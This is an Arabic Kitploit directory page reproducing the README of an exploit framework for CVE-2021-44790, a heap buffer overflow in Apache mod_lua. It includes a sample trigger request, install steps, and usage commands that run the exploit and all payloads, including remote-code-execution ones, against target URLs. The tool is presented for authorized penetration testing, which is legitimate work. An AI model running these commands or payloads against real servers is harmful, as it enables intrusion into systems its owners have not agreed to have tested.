Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790 — Apache HTTP Server 2.4.x mod_lua Buffer Overflow (CVE-2021-44790) - إطار استغلال متقدم مع بصمات، فحص متعدد المراحل، بنية إضافات، تقارير احترافية، التقاط لقطات شاشة، قاعدة بيانات SQLite، واكتشاف بثقة تزيد عن 95%. المؤلف: Sudeepa Wanigarathna. | Kitploit
أدوات/GitHubGitHub/cerberusmrxi/apache-lua-buffer-overflow-exploit-cve-2021-44790
ماسحات الثغرات الأمنية للويبأطر الاستغلالالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubcerberusmrxi/apache-lua-buffer-overflow-exploit-cve-2021-44790

Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790

Apache HTTP Server 2.4.x mod_lua Buffer Overflow (CVE-2021-44790) - إطار استغلال متقدم مع بصمات، فحص متعدد المراحل، بنية إضافات، تقارير احترافية، التقاط لقطات شاشة، قاعدة بيانات SQLite، واكتشاف بثقة تزيد عن 95%. المؤلف: Sudeepa Wanigarathna.

عرض المستودع
110منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🔥 CVE-2021-44790 - استغلال تجاوز سعة المخزن المؤقت في Apache mod_lua

Version Python License CVE Apache CVSS Author


📋 نظرة عامة

استغلال تجاوز سعة المخزن المؤقت في Apache mod_lua هو منصة استغلال متقدمة بمستوى المؤسسات لـ - وهي ثغرة حرجة من نوع تجاوز سعة المخزن المؤقت في وحدة الخاصة بخادم Apache HTTP Server 2.4.x. يوفر هذا الإطار بصمة شاملة، واكتشافًا ذكيًا للنصوص البرمجية، ومسحًا متعدد المراحل، وقدرات إعداد تقارير احترافية مع .

CVE-2021-44790
mod_lua
دقة كشف تزيد عن 95%

⚡ الميزات الرئيسية

الميزةالوصف
🔍 بصمة متقدمةكشف إصدار Apache، وmod_lua، ونظام التشغيل، والبنية، وWAF، وCDN، والحاوية، ومزود السحابة
🎯 اكتشاف ذكيأكثر من 7 تقنيات اكتشاف تشمل robots.txt وsitemap وتحميل HTML واستخراج JavaScript
💥 مسح متعدد المراحلاتصال ← بصمة ← اكتشاف ← تحقق ← استغلال ← إعداد تقارير
🧩 نظام إضافات قابل للتوسعةتطوير سهل للإضافات لثغرات CVE مستقبلية
🌐 محرك HTTP ذكيتجميع الاتصالات، وإعادة المحاولة، ودعم HTTP/2، وتحديد المعدل
📊 إعداد تقارير شاملJSON وHTML وMarkdown وPDF مع لوحات تحكم تفاعلية
🎨 واجهة طرفية جميلةمكتبة غنية بأشرطة تقدم وجداول ومخرجات ملونة
💾 قاعدة بيانات بحثيةتخزين SQLite مع سجل مسح كامل ودعم الاستعلامات
📸 التقاط لقطات الشاشةلقطات شاشة تلقائية لصفحات الويب لجمع الأدلة
🚀 أداء عالٍأكثر من 20 خيطًا متزامنًا وأكثر من 100 مجموعة اتصالات

🎯 تفاصيل الثغرة

السمةالقيمة
معرف CVECVE-2021-44790
الثغرةتجاوز سعة المخزن المؤقت (نقصان عددي صحيح)
البرنامج المتأثرApache HTTP Server من 2.4.0 حتى 2.4.51
الإصدار المُصَحَّحApache HTTP Server 2.4.52 والإصدارات الأحدث
المكوّنوحدة mod_lua
متجه الهجومالشبكة (عن بُعد)
درجة CVSS9.8 (حرجة)
تأثير السريةمرتفع
تأثير التكاملمرتفع
تأثير التوافرمرتفع
نضج الاستغلالإثبات المفهوم متاح

الوصف الفني

توجد الثغرة في وحدة mod_lua عند معالجة طلبات multipart/form-data. يمكن أن يؤدي نقصان عددي صحيح في دالة lua_request_parsebody() إلى تجاوز سعة مخزن مؤقت قائم على الكومة (heap)، مما قد يسمح بتنفيذ تعليمات برمجية عن بُعد.

root@kitploit:~
POST /process.lua HTTP/1.1
Host: target.com
Content-Type: multipart/form-data; boundary=4

4
Content-Disposition: form-data; name="name"

0
4

📸 لقطات الشاشة

الواجهة الرئيسيةنتائج البصمة
تقدم المسحلوحة تحكم تقرير HTML

🚀 بدء سريع

التثبيت

root@kitploit:~
# Clone the repository
git clone https://github.com/CerberusMrXi/Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790
cd Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790

# Install dependencies
pip install -r requirements.txt

# Verify installation
python3 exploit.py --version

الاستخدام الأساسي

root@kitploit:~
# Quick vulnerability scan
python3 exploit.py http://target.com

# Verbose scan with exploitation
python3 exploit.py https://target.com --exploit --verbose

# Generate all reports
python3 exploit.py http://target.com --report all

# Research mode with database
python3 exploit.py http://target.com --research

📋 الاستخدام المفصّل

خيارات سطر الأوامر

root@kitploit:~
python3 exploit.py [TARGET] [OPTIONS]
الخيارالوصفمثال
TARGETرابط URL للهدفhttp://target.com
--config FILEملف الإعدادات--config config.yaml
--threads Nعدد الخيوط--threads 30
--timeout Nمهلة الطلب (بالثواني)--timeout 15
--proxy URLرابط الوكيل (Proxy)--proxy http://127.0.0.1:8080
--verboseمخرجات تفصيلية--verbose
--scan-onlyمسح دون استغلال--scan-only
--exploitتفعيل الاستغلال--exploit
--all-payloadsاستخدام كل الحمولات--all-payloads
--report FORMATصيغة التقرير (json/html/markdown/all)--report all
--output DIRمجلد الإخراج--output /path/to/reports/
--researchتفعيل وضع البحث--research
--database FILEمسار قاعدة البيانات--database luastorm.db
--screenshotالتقاط لقطات شاشة--screenshot
--batch FILEملف دفعة يحتوي على الأهداف--batch targets.txt
--query SQLتنفيذ استعلام قاعدة البيانات--query "SELECT * FROM targets"

أمثلة

1. تقييم الثغرات الأساسي

root@kitploit:~
python3 exploit.py https://example.com --verbose --report all

2. مسح بيئة الشركات

root@kitploit:~
python3 exploit.py https://internal-server.com \
    --proxy http://proxy.corp.com:8080 \
    --threads 10 \
    --timeout 15 \
    --verbose \
    --report all \
    --output /var/log/security/

3. اختبار اختراق كامل

root@kitploit:~
python3 exploit.py https://client.com \
    --threads 30 \
    --timeout 10 \
    --exploit \
    --all-payloads \
    --report all \
    --screenshot \
    --research \
    --verbose \
    --output /pentest/client_name/

4. المسح الدفعي

root@kitploit:~
python3 exploit.py --batch targets.txt --config config.yaml

5. استعلامات قاعدة البيانات

root@kitploit:~
# Show all vulnerable targets
python3 exploit.py --query "SELECT * FROM targets WHERE vulnerable=1"

# Get statistics
python3 exploit.py --query "SELECT COUNT(*) as total, SUM(vulnerable) as vulnerable FROM targets"

⚙️ الإعدادات

config.yaml

root@kitploit:~
# ----------------------------------------------------------------------------
# LuaStorm Exploit Framework - Configuration File
# ----------------------------------------------------------------------------

# Scan Settings
threads: 20                    # Concurrent threads
timeout: 10                    # Request timeout in seconds
retries: 3                     # Number of retry attempts
rate_limit: 10                 # Requests per second
max_depth: 3                   # Directory traversal depth
follow_redirects: true         # Follow HTTP redirects
verify_ssl: false              # Verify SSL certificates

# Network Settings
proxy: null                    # Proxy URL
http2: true                    # Enable HTTP/2 support
user_agent: random             # User-Agent (random/specific)
save_packets: false            # Save raw network packets

# Analysis Settings
research_mode: true            # Enable research database
verbose: false                 # Verbose output
scan_only: false               # Scan without exploitation
exploit: false                 # Enable exploitation
all_payloads: false            # Use all payloads

# Payload Settings
payloads:
  detection: true
  memory: true
  rce: true
  dos: false

# Report Settings
report_json: true
report_html: true
report_markdown: true
report_pdf: false
screenshot: false
reports_dir: reports

# Database Settings
database_path: luastorm.db
database_retention: 365

# Directory Settings
logs_dir: logs
screenshots_dir: screenshots

📊 التقارير

لوحة تحكم HTML

  • مخططات وجداول تفاعلية
  • تصور بصمة الهدف
  • ملخص اكتشاف النصوص البرمجية
  • الخط الزمني لتنفيذ الحمولات
  • تقييم الثغرات
  • تسجيل درجات المخاطر

تقرير JSON

root@kitploit:~
{
  "scan_id": "a1b2c3d4",
  "target": {
    "url": "https://example.com",
    "hostname": "example.com",
    "port": 443
  },
  "vulnerable": true,
  "risk_level": "Critical",
  "scan_duration": 45.23,
  "timestamp": "2026-08-04T15:45:23"
}

تقرير Markdown

  • توثيق سهل القراءة
  • بيانات منسقة في جداول
  • سهولة المشاركة والتضمين
  • متوافق مع أنظمة التحكم بالإصدارات

🗄️ مخطط قاعدة البيانات

root@kitploit:~
-- Targets table
CREATE TABLE targets (
    id INTEGER PRIMARY KEY,
    scan_id TEXT UNIQUE,
    url TEXT,
    hostname TEXT,
    ip TEXT,
    port INTEGER,
    protocol TEXT,
    apache_version TEXT,
    lua_version TEXT,
    os TEXT,
    architecture TEXT,
    waf TEXT,
    cdn TEXT,
    vulnerable INTEGER,
    risk_level TEXT,
    scan_date TEXT,
    duration REAL
);

-- Scripts table
CREATE TABLE scripts (
    id INTEGER PRIMARY KEY,
    scan_id TEXT,
    path TEXT,
    method TEXT,
    status_code INTEGER,
    content_type TEXT,
    response_time REAL,
    vulnerable INTEGER
);

-- Payloads table
CREATE TABLE payloads (
    id INTEGER PRIMARY KEY,
    scan_id TEXT,
    script_id INTEGER,
    payload_name TEXT,
    payload_type TEXT,
    success INTEGER,
    response_time REAL,
    indicators TEXT,
    error TEXT
);

🔧 نظام الإضافات

إنشاء إضافة

root@kitploit:~
# plugins/my_plugin.py
class MyPlugin:
    plugin_name = "my_plugin"
    plugin_version = "1.0"
    plugin_author = "Your Name"
    
    def __init__(self, config):
        self.config = config
    
    def execute(self, target_info):
        """Execute plugin logic"""
        return {
            'status': 'success',
            'message': 'Plugin executed',
            'data': {'target': target_info.url}
        }

🛡️ اعتبارات أمنية

  • للاستخدام المصرح به فقط: هذه الأداة مخصصة لاختبارات الأمن المصرح بها
  • الامتثال القانوني: تأكد من حصولك على إذن قبل الاختبار
  • الإفصاح المسؤول: أبلغ عن الثغرات بمسؤولية
  • حماية البيانات: تُخزَّن جميع البيانات الحساسة محليًا

⚠️ إخلاء مسؤولية

root@kitploit:~
THIS TOOL IS PROVIDED FOR EDUCATIONAL AND AUTHORIZED TESTING PURPOSES ONLY.

Unauthorized use against systems you do not own or have explicit permission to test
is illegal and unethical. The author assumes no responsibility for misuse, damage,
or legal consequences arising from the use of this tool.

By using this tool, you agree to:
1. Only test systems you own or have written permission to test
2. Comply with all applicable laws and regulations
3. Report findings responsibly
4. Not use this tool for malicious purposes

📈 مقاييس الأداء

الميزةالأداء
البصمةأقل من ثانيتين
اكتشاف النصوص البرمجية5-10 ثوانٍ
اختبار الحمولات1-5 ثوانٍ لكل حمولة
إنشاء التقاريرأقل من ثانية واحدة
عمليات قاعدة البياناتأقل من 100 مللي ثانية
الخيوط المتزامنة20+
مجموعة الاتصالات100+

🗺️ خارطة الطريق

الإصدار 2.1 (مخطط له)

  • دعم إضافي لثغرات CVE
  • واجهة ويب
  • حاويات Docker
  • خط أنابيب CI/CD
  • المزيد من أشكال الحمولات

الإصدار 2.2 (مستقبلي)

  • تكامل التعلم الآلي
  • استغلال آلي
  • مسح قائم على السحابة
  • ميزات تعاون الفريق
  • تقنيات مراوغة متقدمة

🤝 المساهمة

المساهمات مرحّب بها! يرجى اتباع الإرشادات التالية:

  1. انسخ المستودع (Fork)
  2. أنشئ فرعًا للميزة
  3. قم بإجراء تعديلاتك
  4. أرسل طلب سحب (Pull Request)

إعداد التطوير

root@kitploit:~
# Clone your fork
git clone https://github.com/CerberusMrXi/Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790
cd Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790

# Install development dependencies
pip install -r requirements-dev.txt

# Run tests
python -m pytest tests/

👨‍💻 المؤلف

Sudeepa Wanigarathna

  • باحث أمني وهاكر أخلاقي
  • GitHub: @CerberusMrXi
  • التركيز: أبحاث الثغرات وتطوير الاستغلال

📄 الترخيص

لأغراض تعليمية واختبارات مصرح بها فقط

يُقدَّم هذا البرنامج «كما هو»، دون أي ضمان من أي نوع، صريح أو ضمني.


⭐ امنح هذا المستودع نجمة لدعم المشروع!

💡 وجدت خطأً؟ افتح مشكلة

📧 تواصل: [email protected]


صُنع بـ ❤️ لمجتمع الأمن

تنزيل الأداة